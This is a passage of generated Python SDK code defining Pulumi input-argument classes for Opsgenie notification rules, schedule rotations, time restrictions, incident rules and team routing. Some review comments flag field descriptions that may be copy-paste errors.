    @pulumi.getter
    def operation(self) -> pulumi.Input[str]:
        """
        Possible values: `matches`, `contains`, `starts-with`, `ends-with`, `equals`, `contains-key`, `contains-value`, `greater-than`, `less-than`, `is-empty`, `equals-ignore-whitespace`
        """
        return pulumi.get(self, "operation")

    @operation.setter
    def operation(self, value: pulumi.Input[str]):
        pulumi.set(self, "operation", value)

    @property
    @pulumi.getter(name="expectedValue")
    def expected_value(self) -> Optional[pulumi.Input[str]]:
        """
        User defined value that will be compared with alert field according to the operation. Default: empty string
        """
        return pulumi.get(self, "expected_value")

    @expected_value.setter
    def expected_value(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "expected_value", value)

    @property
    @pulumi.getter
    def key(self) -> Optional[pulumi.Input[str]]:
        """
        If 'field' is set as 'extra-properties', key could be used for key-value pair
        """
        return pulumi.get(self, "key")

    @key.setter
    def key(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "key", value)

    # "not" is a Python keyword, hence the trailing underscore; the wire
    # name is "not" (see the getter's name= override below).
    @property
    @pulumi.getter(name="not")
    def not_(self) -> Optional[pulumi.Input[bool]]:
        """
        Indicates behaviour of the given operation. Default: `false`
        """
        return pulumi.get(self, "not_")

    @not_.setter
    def not_(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "not_", value)

    @property
    @pulumi.getter
    def order(self) -> Optional[pulumi.Input[int]]:
        """
        Order of the condition in conditions list
        """
        return pulumi.get(self, "order")

    @order.setter
    def order(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "order", value)
@pulumi.input_type
class NotificationRuleRepeatArgs:
    def __init__(__self__, *,
                 loop_after: pulumi.Input[int],
                 enabled: Optional[pulumi.Input[bool]] = None):
        """
        :param pulumi.Input[int] loop_after: Interval after which the rule's steps repeat — presumably in minutes, like `send_after` on steps; TODO confirm against the provider schema.
        :param pulumi.Input[bool] enabled: Defines whether this step is enabled. Default: `true`
        """
        pulumi.set(__self__, "loop_after", loop_after)
        if enabled is not None:
            pulumi.set(__self__, "enabled", enabled)

    @property
    @pulumi.getter(name="loopAfter")
    def loop_after(self) -> pulumi.Input[int]:
        """
        Interval after which the rule's steps repeat — presumably in minutes; TODO confirm against the provider schema.
        """
        return pulumi.get(self, "loop_after")

    @loop_after.setter
    def loop_after(self, value: pulumi.Input[int]):
        pulumi.set(self, "loop_after", value)

    @property
    @pulumi.getter
    def enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Defines whether this step is enabled. Default: `true`
        """
        return pulumi.get(self, "enabled")

    @enabled.setter
    def enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enabled", value)
@pulumi.input_type
class NotificationRuleScheduleArgs:
    def __init__(__self__, *,
                 name: pulumi.Input[str],
                 type: pulumi.Input[str]):
        """
        :param pulumi.Input[str] name: Name of the notification policy
        :param pulumi.Input[str] type: Kind of matching filter. Possible values: `match-all`, `match-any-condition`, `match-all-conditions`
            NOTE(review): this generated description looks copied from the criteria block — a schedule `type` is unlikely to take filter values; verify against the provider schema.
        """
        pulumi.set(__self__, "name", name)
        pulumi.set(__self__, "type", type)

    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """
        Name of the notification policy
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: pulumi.Input[str]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """
        Kind of matching filter. Possible values: `match-all`, `match-any-condition`, `match-all-conditions`
        NOTE(review): description looks copy-pasted from the criteria block — verify against the provider schema.
        """
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)
@pulumi.input_type
class NotificationRuleStepArgs:
    def __init__(__self__, *,
                 contacts: pulumi.Input[Sequence[pulumi.Input['NotificationRuleStepContactArgs']]],
                 enabled: Optional[pulumi.Input[bool]] = None,
                 send_after: Optional[pulumi.Input[int]] = None):
        """
        :param pulumi.Input[Sequence[pulumi.Input['NotificationRuleStepContactArgs']]] contacts: Defines the contact that notification will be sent to. This is a block, structure is documented below.
        :param pulumi.Input[bool] enabled: Defines whether this step is enabled. Default: `true`
        :param pulumi.Input[int] send_after: Time period, in minutes, notification will be sent after.
        """
        pulumi.set(__self__, "contacts", contacts)
        if enabled is not None:
            pulumi.set(__self__, "enabled", enabled)
        if send_after is not None:
            pulumi.set(__self__, "send_after", send_after)

    @property
    @pulumi.getter
    def contacts(self) -> pulumi.Input[Sequence[pulumi.Input['NotificationRuleStepContactArgs']]]:
        """
        Defines the contact that notification will be sent to. This is a block, structure is documented below.
        """
        return pulumi.get(self, "contacts")

    @contacts.setter
    def contacts(self, value: pulumi.Input[Sequence[pulumi.Input['NotificationRuleStepContactArgs']]]):
        pulumi.set(self, "contacts", value)

    @property
    @pulumi.getter
    def enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Defines whether this step is enabled. Default: `true`
        """
        return pulumi.get(self, "enabled")

    @enabled.setter
    def enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enabled", value)

    @property
    @pulumi.getter(name="sendAfter")
    def send_after(self) -> Optional[pulumi.Input[int]]:
        """
        Time period, in minutes, notification will be sent after.
        """
        return pulumi.get(self, "send_after")

    @send_after.setter
    def send_after(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "send_after", value)
@pulumi.input_type
class NotificationRuleStepContactArgs:
    def __init__(__self__, *,
                 method: pulumi.Input[str],
                 to: pulumi.Input[str]):
        """
        :param pulumi.Input[str] method: Contact method. Possible values: `email`, `sms`, `voice`, `mobile`
        :param pulumi.Input[str] to: Address of a given method (eg. email address for `email`, phone number for `sms`/`voice` or mobile application name for `mobile`)
        """
        pulumi.set(__self__, "method", method)
        pulumi.set(__self__, "to", to)

    @property
    @pulumi.getter
    def method(self) -> pulumi.Input[str]:
        """
        Contact method. Possible values: `email`, `sms`, `voice`, `mobile`
        """
        return pulumi.get(self, "method")

    @method.setter
    def method(self, value: pulumi.Input[str]):
        pulumi.set(self, "method", value)

    @property
    @pulumi.getter
    def to(self) -> pulumi.Input[str]:
        """
        Address of a given method (eg. email address for `email`, phone number for `sms`/`voice` or mobile application name for `mobile`)
        """
        return pulumi.get(self, "to")

    @to.setter
    def to(self, value: pulumi.Input[str]):
        pulumi.set(self, "to", value)
@pulumi.input_type
class NotificationRuleTimeRestrictionArgs:
    def __init__(__self__, *,
                 type: pulumi.Input[str],
                 restrictions: Optional[pulumi.Input[Sequence[pulumi.Input['NotificationRuleTimeRestrictionRestrictionArgs']]]] = None):
        """
        :param pulumi.Input[str] type: Kind of matching filter. Possible values: `match-all`, `match-any-condition`, `match-all-conditions`
            NOTE(review): description looks copy-pasted from the criteria block; the parallel NotificationPolicyTimeRestrictionArgs uses `time-of-day` / `weekday-and-time-of-day` — verify against the provider schema.
        :param pulumi.Input[Sequence[pulumi.Input['NotificationRuleTimeRestrictionRestrictionArgs']]] restrictions: List of restriction windows — presumably for type = `weekday-and-time-of-day`, mirroring NotificationPolicyTimeRestrictionArgs; TODO confirm.
        """
        pulumi.set(__self__, "type", type)
        if restrictions is not None:
            pulumi.set(__self__, "restrictions", restrictions)

    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """
        Kind of matching filter. Possible values: `match-all`, `match-any-condition`, `match-all-conditions`
        NOTE(review): description looks copy-pasted from the criteria block — verify against the provider schema.
        """
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)

    @property
    @pulumi.getter
    def restrictions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['NotificationRuleTimeRestrictionRestrictionArgs']]]]:
        """
        List of restriction windows — presumably for type = `weekday-and-time-of-day`, mirroring NotificationPolicyTimeRestrictionArgs; TODO confirm.
        """
        return pulumi.get(self, "restrictions")

    @restrictions.setter
    def restrictions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['NotificationRuleTimeRestrictionRestrictionArgs']]]]):
        pulumi.set(self, "restrictions", value)
@pulumi.input_type
class NotificationRuleTimeRestrictionRestrictionArgs:
    # Structure mirrors NotificationPolicyTimeRestrictionRestrictionArgs,
    # which documents the same six fields; descriptions below follow it.
    def __init__(__self__, *,
                 end_day: pulumi.Input[str],
                 end_hour: pulumi.Input[int],
                 end_min: pulumi.Input[int],
                 start_day: pulumi.Input[str],
                 start_hour: pulumi.Input[int],
                 start_min: pulumi.Input[int]):
        """
        A single weekday-and-time-of-day restriction window.

        :param pulumi.Input[str] end_day: Ending day of restriction (eg. `wednesday`)
        :param pulumi.Input[int] end_hour: Ending hour of restriction.
        :param pulumi.Input[int] end_min: Ending minute of restriction on defined `end_hour`
        :param pulumi.Input[str] start_day: Starting day of restriction (eg. `monday`)
        :param pulumi.Input[int] start_hour: Starting hour of restriction.
        :param pulumi.Input[int] start_min: Starting minute of restriction on defined `start_hour`
        """
        pulumi.set(__self__, "end_day", end_day)
        pulumi.set(__self__, "end_hour", end_hour)
        pulumi.set(__self__, "end_min", end_min)
        pulumi.set(__self__, "start_day", start_day)
        pulumi.set(__self__, "start_hour", start_hour)
        pulumi.set(__self__, "start_min", start_min)

    @property
    @pulumi.getter(name="endDay")
    def end_day(self) -> pulumi.Input[str]:
        """
        Ending day of restriction (eg. `wednesday`)
        """
        return pulumi.get(self, "end_day")

    @end_day.setter
    def end_day(self, value: pulumi.Input[str]):
        pulumi.set(self, "end_day", value)

    @property
    @pulumi.getter(name="endHour")
    def end_hour(self) -> pulumi.Input[int]:
        """
        Ending hour of restriction.
        """
        return pulumi.get(self, "end_hour")

    @end_hour.setter
    def end_hour(self, value: pulumi.Input[int]):
        pulumi.set(self, "end_hour", value)

    @property
    @pulumi.getter(name="endMin")
    def end_min(self) -> pulumi.Input[int]:
        """
        Ending minute of restriction on defined `end_hour`
        """
        return pulumi.get(self, "end_min")

    @end_min.setter
    def end_min(self, value: pulumi.Input[int]):
        pulumi.set(self, "end_min", value)

    @property
    @pulumi.getter(name="startDay")
    def start_day(self) -> pulumi.Input[str]:
        """
        Starting day of restriction (eg. `monday`)
        """
        return pulumi.get(self, "start_day")

    @start_day.setter
    def start_day(self, value: pulumi.Input[str]):
        pulumi.set(self, "start_day", value)

    @property
    @pulumi.getter(name="startHour")
    def start_hour(self) -> pulumi.Input[int]:
        """
        Starting hour of restriction.
        """
        return pulumi.get(self, "start_hour")

    @start_hour.setter
    def start_hour(self, value: pulumi.Input[int]):
        pulumi.set(self, "start_hour", value)

    @property
    @pulumi.getter(name="startMin")
    def start_min(self) -> pulumi.Input[int]:
        """
        Starting minute of restriction on defined `start_hour`
        """
        return pulumi.get(self, "start_min")

    @start_min.setter
    def start_min(self, value: pulumi.Input[int]):
        pulumi.set(self, "start_min", value)
@pulumi.input_type
class ScheduleRotationParticipantArgs:
    def __init__(__self__, *,
                 type: pulumi.Input[str],
                 id: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] type: The responder type.
        :param pulumi.Input[str] id: The id of the responder.
        """
        pulumi.set(__self__, "type", type)
        if id is not None:
            pulumi.set(__self__, "id", id)

    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """
        The responder type.
        """
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)

    @property
    @pulumi.getter
    def id(self) -> Optional[pulumi.Input[str]]:
        """
        The id of the responder.
        """
        return pulumi.get(self, "id")

    @id.setter
    def id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "id", value)
@pulumi.input_type
class ScheduleRotationTimeRestrictionArgs:
    def __init__(__self__, *,
                 type: pulumi.Input[str],
                 restriction: Optional[pulumi.Input[Sequence[pulumi.Input['ScheduleRotationTimeRestrictionRestrictionArgs']]]] = None,
                 restrictions: Optional[pulumi.Input[Sequence[pulumi.Input['ScheduleRotationTimeRestrictionRestrictionArgs']]]] = None):
        """
        :param pulumi.Input[str] type: This parameter should be set to `time-of-day` or `weekday-and-time-of-day`.
        :param pulumi.Input[Sequence[pulumi.Input['ScheduleRotationTimeRestrictionRestrictionArgs']]] restriction: It is a restriction object which is described below. In this case startDay/endDay fields are not supported. This can be used only if time restriction type is `time-of-day`.
        :param pulumi.Input[Sequence[pulumi.Input['ScheduleRotationTimeRestrictionRestrictionArgs']]] restrictions: It is a restriction object which is described below. This can be used only if time restriction type is `weekday-and-time-of-day`.
        """
        pulumi.set(__self__, "type", type)
        if restriction is not None:
            pulumi.set(__self__, "restriction", restriction)
        if restrictions is not None:
            pulumi.set(__self__, "restrictions", restrictions)

    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """
        This parameter should be set to `time-of-day` or `weekday-and-time-of-day`.
        """
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)

    @property
    @pulumi.getter
    def restriction(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ScheduleRotationTimeRestrictionRestrictionArgs']]]]:
        """
        It is a restriction object which is described below. In this case startDay/endDay fields are not supported. This can be used only if time restriction type is `time-of-day`.
        """
        return pulumi.get(self, "restriction")

    @restriction.setter
    def restriction(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ScheduleRotationTimeRestrictionRestrictionArgs']]]]):
        pulumi.set(self, "restriction", value)

    @property
    @pulumi.getter
    def restrictions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ScheduleRotationTimeRestrictionRestrictionArgs']]]]:
        """
        It is a restriction object which is described below. This can be used only if time restriction type is `weekday-and-time-of-day`.
        """
        return pulumi.get(self, "restrictions")

    @restrictions.setter
    def restrictions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ScheduleRotationTimeRestrictionRestrictionArgs']]]]):
        pulumi.set(self, "restrictions", value)
@pulumi.input_type
class ScheduleRotationTimeRestrictionRestrictionArgs:
    def __init__(__self__, *,
                 end_day: pulumi.Input[str],
                 end_hour: pulumi.Input[int],
                 end_min: pulumi.Input[int],
                 start_day: pulumi.Input[str],
                 start_hour: pulumi.Input[int],
                 start_min: pulumi.Input[int]):
        """
        A single time frame of a schedule-rotation time restriction.

        :param pulumi.Input[str] end_day: Value of the day that frame will end.
        :param pulumi.Input[int] end_hour: Value of the hour that frame will end.
        :param pulumi.Input[int] end_min: Value of the minute that frame will end. Minutes may take 0 or 30 as value. Otherwise they will be converted to nearest 0 or 30 automatically.
        :param pulumi.Input[str] start_day: Value of the day that frame will start.
        :param pulumi.Input[int] start_hour: Value of the hour that frame will start.
        :param pulumi.Input[int] start_min: Value of the minute that frame will start. Minutes may take 0 or 30 as value. Otherwise they will be converted to nearest 0 or 30 automatically.
        """
        pulumi.set(__self__, "end_day", end_day)
        pulumi.set(__self__, "end_hour", end_hour)
        pulumi.set(__self__, "end_min", end_min)
        pulumi.set(__self__, "start_day", start_day)
        pulumi.set(__self__, "start_hour", start_hour)
        pulumi.set(__self__, "start_min", start_min)

    @property
    @pulumi.getter(name="endDay")
    def end_day(self) -> pulumi.Input[str]:
        """
        Value of the day that frame will end.
        """
        return pulumi.get(self, "end_day")

    @end_day.setter
    def end_day(self, value: pulumi.Input[str]):
        pulumi.set(self, "end_day", value)

    @property
    @pulumi.getter(name="endHour")
    def end_hour(self) -> pulumi.Input[int]:
        """
        Value of the hour that frame will end.
        """
        return pulumi.get(self, "end_hour")

    @end_hour.setter
    def end_hour(self, value: pulumi.Input[int]):
        pulumi.set(self, "end_hour", value)

    @property
    @pulumi.getter(name="endMin")
    def end_min(self) -> pulumi.Input[int]:
        """
        Value of the minute that frame will end. Minutes may take 0 or 30 as value. Otherwise they will be converted to nearest 0 or 30 automatically.
        """
        return pulumi.get(self, "end_min")

    @end_min.setter
    def end_min(self, value: pulumi.Input[int]):
        pulumi.set(self, "end_min", value)

    @property
    @pulumi.getter(name="startDay")
    def start_day(self) -> pulumi.Input[str]:
        """
        Value of the day that frame will start.
        """
        return pulumi.get(self, "start_day")

    @start_day.setter
    def start_day(self, value: pulumi.Input[str]):
        pulumi.set(self, "start_day", value)

    @property
    @pulumi.getter(name="startHour")
    def start_hour(self) -> pulumi.Input[int]:
        """
        Value of the hour that frame will start.
        """
        return pulumi.get(self, "start_hour")

    @start_hour.setter
    def start_hour(self, value: pulumi.Input[int]):
        pulumi.set(self, "start_hour", value)

    @property
    @pulumi.getter(name="startMin")
    def start_min(self) -> pulumi.Input[int]:
        """
        Value of the minute that frame will start. Minutes may take 0 or 30 as value. Otherwise they will be converted to nearest 0 or 30 automatically.
        """
        return pulumi.get(self, "start_min")

    @start_min.setter
    def start_min(self, value: pulumi.Input[int]):
        pulumi.set(self, "start_min", value)
@pulumi.input_type
class ServiceIncidentRuleIncidentRuleArgs:
    def __init__(__self__, *,
                 incident_properties: pulumi.Input[Sequence[pulumi.Input['ServiceIncidentRuleIncidentRuleIncidentPropertyArgs']]],
                 condition_match_type: Optional[pulumi.Input[str]] = None,
                 conditions: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceIncidentRuleIncidentRuleConditionArgs']]]] = None):
        """
        :param pulumi.Input[Sequence[pulumi.Input['ServiceIncidentRuleIncidentRuleIncidentPropertyArgs']]] incident_properties: Properties for incident rule. This is a block, structure is documented below.
        :param pulumi.Input[str] condition_match_type: A Condition type, supported types are: `match-all`, `match-any-condition`, `match-all-conditions`. Default: `match-all`
        :param pulumi.Input[Sequence[pulumi.Input['ServiceIncidentRuleIncidentRuleConditionArgs']]] conditions: Conditions applied to incident. This is a block, structure is documented below.
        """
        pulumi.set(__self__, "incident_properties", incident_properties)
        if condition_match_type is not None:
            pulumi.set(__self__, "condition_match_type", condition_match_type)
        if conditions is not None:
            pulumi.set(__self__, "conditions", conditions)

    @property
    @pulumi.getter(name="incidentProperties")
    def incident_properties(self) -> pulumi.Input[Sequence[pulumi.Input['ServiceIncidentRuleIncidentRuleIncidentPropertyArgs']]]:
        """
        Properties for incident rule. This is a block, structure is documented below.
        """
        return pulumi.get(self, "incident_properties")

    @incident_properties.setter
    def incident_properties(self, value: pulumi.Input[Sequence[pulumi.Input['ServiceIncidentRuleIncidentRuleIncidentPropertyArgs']]]):
        pulumi.set(self, "incident_properties", value)

    @property
    @pulumi.getter(name="conditionMatchType")
    def condition_match_type(self) -> Optional[pulumi.Input[str]]:
        """
        A Condition type, supported types are: `match-all`, `match-any-condition`, `match-all-conditions`. Default: `match-all`
        """
        return pulumi.get(self, "condition_match_type")

    @condition_match_type.setter
    def condition_match_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "condition_match_type", value)

    @property
    @pulumi.getter
    def conditions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ServiceIncidentRuleIncidentRuleConditionArgs']]]]:
        """
        Conditions applied to incident. This is a block, structure is documented below.
        """
        return pulumi.get(self, "conditions")

    @conditions.setter
    def conditions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceIncidentRuleIncidentRuleConditionArgs']]]]):
        pulumi.set(self, "conditions", value)
@pulumi.input_type
class ServiceIncidentRuleIncidentRuleConditionArgs:
    """Input arguments for one condition inside an incident rule."""

    def __init__(__self__, *,
                 field: pulumi.Input[str],
                 operation: pulumi.Input[str],
                 expected_value: Optional[pulumi.Input[str]] = None,
                 key: Optional[pulumi.Input[str]] = None,
                 not_: Optional[pulumi.Input[bool]] = None):
        """
        :param pulumi.Input[str] field: Specifies which alert field will be used in condition. Possible values are `message`, `alias`, `description`, `source`, `entity`, `tags`, `actions`, `details`, `extra-properties`, `recipients`, `teams`, `priority`
        :param pulumi.Input[str] operation: It is the operation that will be executed for the given field and key. Possible operations are `matches`, `contains`, `starts-with`, `ends-with`, `equals`, `contains-key`, `contains-value`, `greater-than`, `less-than`, `is-empty`, `equals-ignore-whitespace`.
        :param pulumi.Input[str] expected_value: User defined value that will be compared with alert field according to the operation. Default: empty string
        :param pulumi.Input[str] key: If field is set as extra-properties, key could be used for key-value pair.
        :param pulumi.Input[bool] not_: Indicates behaviour of the given operation. Default: false
        """
        pulumi.set(__self__, "field", field)
        pulumi.set(__self__, "operation", operation)
        if expected_value is not None:
            pulumi.set(__self__, "expected_value", expected_value)
        if key is not None:
            pulumi.set(__self__, "key", key)
        if not_ is not None:
            pulumi.set(__self__, "not_", not_)

    @property
    @pulumi.getter
    def field(self) -> pulumi.Input[str]:
        """
        Specifies which alert field will be used in condition. Possible values are `message`, `alias`, `description`, `source`, `entity`, `tags`, `actions`, `details`, `extra-properties`, `recipients`, `teams`, `priority`
        """
        return pulumi.get(self, "field")

    @field.setter
    def field(self, value: pulumi.Input[str]):
        pulumi.set(self, "field", value)

    @property
    @pulumi.getter
    def operation(self) -> pulumi.Input[str]:
        """
        It is the operation that will be executed for the given field and key. Possible operations are `matches`, `contains`, `starts-with`, `ends-with`, `equals`, `contains-key`, `contains-value`, `greater-than`, `less-than`, `is-empty`, `equals-ignore-whitespace`.
        """
        return pulumi.get(self, "operation")

    @operation.setter
    def operation(self, value: pulumi.Input[str]):
        pulumi.set(self, "operation", value)

    @property
    @pulumi.getter(name="expectedValue")
    def expected_value(self) -> Optional[pulumi.Input[str]]:
        """
        User defined value that will be compared with alert field according to the operation. Default: empty string
        """
        return pulumi.get(self, "expected_value")

    @expected_value.setter
    def expected_value(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "expected_value", value)

    @property
    @pulumi.getter
    def key(self) -> Optional[pulumi.Input[str]]:
        """
        If field is set as extra-properties, key could be used for key-value pair.
        """
        return pulumi.get(self, "key")

    @key.setter
    def key(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "key", value)

    @property
    @pulumi.getter(name="not")
    def not_(self) -> Optional[pulumi.Input[bool]]:
        """
        Indicates behaviour of the given operation. Default: false
        """
        return pulumi.get(self, "not_")

    @not_.setter
    def not_(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "not_", value)
@pulumi.input_type
class ServiceIncidentRuleIncidentRuleIncidentPropertyArgs:
    """Input arguments describing the incident created when an incident rule fires."""

    def __init__(__self__, *,
                 message: pulumi.Input[str],
                 priority: pulumi.Input[str],
                 stakeholder_properties: pulumi.Input[Sequence[pulumi.Input['ServiceIncidentRuleIncidentRuleIncidentPropertyStakeholderPropertyArgs']]],
                 description: Optional[pulumi.Input[str]] = None,
                 details: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
        """
        :param pulumi.Input[str] message: Message that is to be passed to audience that is generally used to provide a content information about the alert.
        :param pulumi.Input[str] priority: Priority level of the alert. Possible values are `P1`, `P2`, `P3`, `P4` and `P5`
        :param pulumi.Input[Sequence[pulumi.Input['ServiceIncidentRuleIncidentRuleIncidentPropertyStakeholderPropertyArgs']]] stakeholder_properties: Details about stakeholders for this rule. This is a block, structure is documented below.
        :param pulumi.Input[str] description: Description that is generally used to provide a detailed information about the alert.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] details: Map of key-value pairs to use as custom properties of the alert.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] tags: Tags of the alert.
        """
        pulumi.set(__self__, "message", message)
        pulumi.set(__self__, "priority", priority)
        pulumi.set(__self__, "stakeholder_properties", stakeholder_properties)
        if description is not None:
            pulumi.set(__self__, "description", description)
        if details is not None:
            pulumi.set(__self__, "details", details)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)

    @property
    @pulumi.getter
    def message(self) -> pulumi.Input[str]:
        """
        Message that is to be passed to audience that is generally used to provide a content information about the alert.
        """
        return pulumi.get(self, "message")

    @message.setter
    def message(self, value: pulumi.Input[str]):
        pulumi.set(self, "message", value)

    @property
    @pulumi.getter
    def priority(self) -> pulumi.Input[str]:
        """
        Priority level of the alert. Possible values are `P1`, `P2`, `P3`, `P4` and `P5`
        """
        return pulumi.get(self, "priority")

    @priority.setter
    def priority(self, value: pulumi.Input[str]):
        pulumi.set(self, "priority", value)

    @property
    @pulumi.getter(name="stakeholderProperties")
    def stakeholder_properties(self) -> pulumi.Input[Sequence[pulumi.Input['ServiceIncidentRuleIncidentRuleIncidentPropertyStakeholderPropertyArgs']]]:
        """
        Details about stakeholders for this rule. This is a block, structure is documented below.
        """
        return pulumi.get(self, "stakeholder_properties")

    @stakeholder_properties.setter
    def stakeholder_properties(self, value: pulumi.Input[Sequence[pulumi.Input['ServiceIncidentRuleIncidentRuleIncidentPropertyStakeholderPropertyArgs']]]):
        pulumi.set(self, "stakeholder_properties", value)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        Description that is generally used to provide a detailed information about the alert.
        """
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)

    @property
    @pulumi.getter
    def details(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        Map of key-value pairs to use as custom properties of the alert.
        """
        return pulumi.get(self, "details")

    @details.setter
    def details(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "details", value)

    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        Tags of the alert.
        """
        return pulumi.get(self, "tags")

    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "tags", value)
@pulumi.input_type
class ServiceIncidentRuleIncidentRuleIncidentPropertyStakeholderPropertyArgs:
    """Input arguments for the stakeholder notification block of an incident property."""

    def __init__(__self__, *,
                 message: pulumi.Input[str],
                 description: Optional[pulumi.Input[str]] = None,
                 enable: Optional[pulumi.Input[bool]] = None):
        """
        :param pulumi.Input[str] message: Message that is to be passed to audience that is generally used to provide a content information about the alert.
        :param pulumi.Input[str] description: Description that is generally used to provide a detailed information about the alert.
        :param pulumi.Input[bool] enable: Option to enable stakeholder notifications. Default value is true.
        """
        pulumi.set(__self__, "message", message)
        if description is not None:
            pulumi.set(__self__, "description", description)
        if enable is not None:
            pulumi.set(__self__, "enable", enable)

    @property
    @pulumi.getter
    def message(self) -> pulumi.Input[str]:
        """
        Message that is to be passed to audience that is generally used to provide a content information about the alert.
        """
        return pulumi.get(self, "message")

    @message.setter
    def message(self, value: pulumi.Input[str]):
        pulumi.set(self, "message", value)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        Description that is generally used to provide a detailed information about the alert.
        """
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)

    @property
    @pulumi.getter
    def enable(self) -> Optional[pulumi.Input[bool]]:
        """
        Option to enable stakeholder notifications. Default value is true.
        """
        return pulumi.get(self, "enable")

    @enable.setter
    def enable(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enable", value)
@pulumi.input_type
class TeamMemberArgs:
    """Input arguments for one member entry of an Opsgenie Team."""

    def __init__(__self__, *,
                 id: pulumi.Input[str],
                 role: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] id: The UUID for the member to add to this Team.
        :param pulumi.Input[str] role: The role for the user within the Team - can be either `admin` or `user`. Default: `user`.
        """
        pulumi.set(__self__, "id", id)
        if role is not None:
            pulumi.set(__self__, "role", role)

    @property
    @pulumi.getter
    def id(self) -> pulumi.Input[str]:
        """
        The UUID for the member to add to this Team.
        """
        return pulumi.get(self, "id")

    @id.setter
    def id(self, value: pulumi.Input[str]):
        pulumi.set(self, "id", value)

    @property
    @pulumi.getter
    def role(self) -> Optional[pulumi.Input[str]]:
        """
        The role for the user within the Team - can be either `admin` or `user`. Default: `user`.
        """
        return pulumi.get(self, "role")

    @role.setter
    def role(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "role", value)
@pulumi.input_type
class TeamRoutingRuleCriteriaArgs:
    """Input arguments for the matching criteria of a Team Routing Rule."""

    def __init__(__self__, *,
                 type: pulumi.Input[str],
                 conditions: Optional[pulumi.Input[Sequence[pulumi.Input['TeamRoutingRuleCriteriaConditionArgs']]]] = None):
        """
        :param pulumi.Input[str] type: Type of the operation will be applied on conditions. Should be one of `match-all`, `match-any-condition` or `match-all-conditions`.
        :param pulumi.Input[Sequence[pulumi.Input['TeamRoutingRuleCriteriaConditionArgs']]] conditions: List of conditions will be checked before applying team routing rule. This field declaration should be omitted if the criteria type is set to match-all.
        """
        pulumi.set(__self__, "type", type)
        if conditions is not None:
            pulumi.set(__self__, "conditions", conditions)

    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """
        Type of the operation will be applied on conditions. Should be one of `match-all`, `match-any-condition` or `match-all-conditions`.
        """
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)

    @property
    @pulumi.getter
    def conditions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['TeamRoutingRuleCriteriaConditionArgs']]]]:
        """
        List of conditions will be checked before applying team routing rule. This field declaration should be omitted if the criteria type is set to match-all.
        """
        return pulumi.get(self, "conditions")

    @conditions.setter
    def conditions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['TeamRoutingRuleCriteriaConditionArgs']]]]):
        pulumi.set(self, "conditions", value)
@pulumi.input_type
class TeamRoutingRuleCriteriaConditionArgs:
    """Input arguments for one condition of a Team Routing Rule's criteria."""

    def __init__(__self__, *,
                 field: pulumi.Input[str],
                 operation: pulumi.Input[str],
                 expected_value: Optional[pulumi.Input[str]] = None,
                 key: Optional[pulumi.Input[str]] = None,
                 not_: Optional[pulumi.Input[bool]] = None,
                 order: Optional[pulumi.Input[int]] = None):
        """
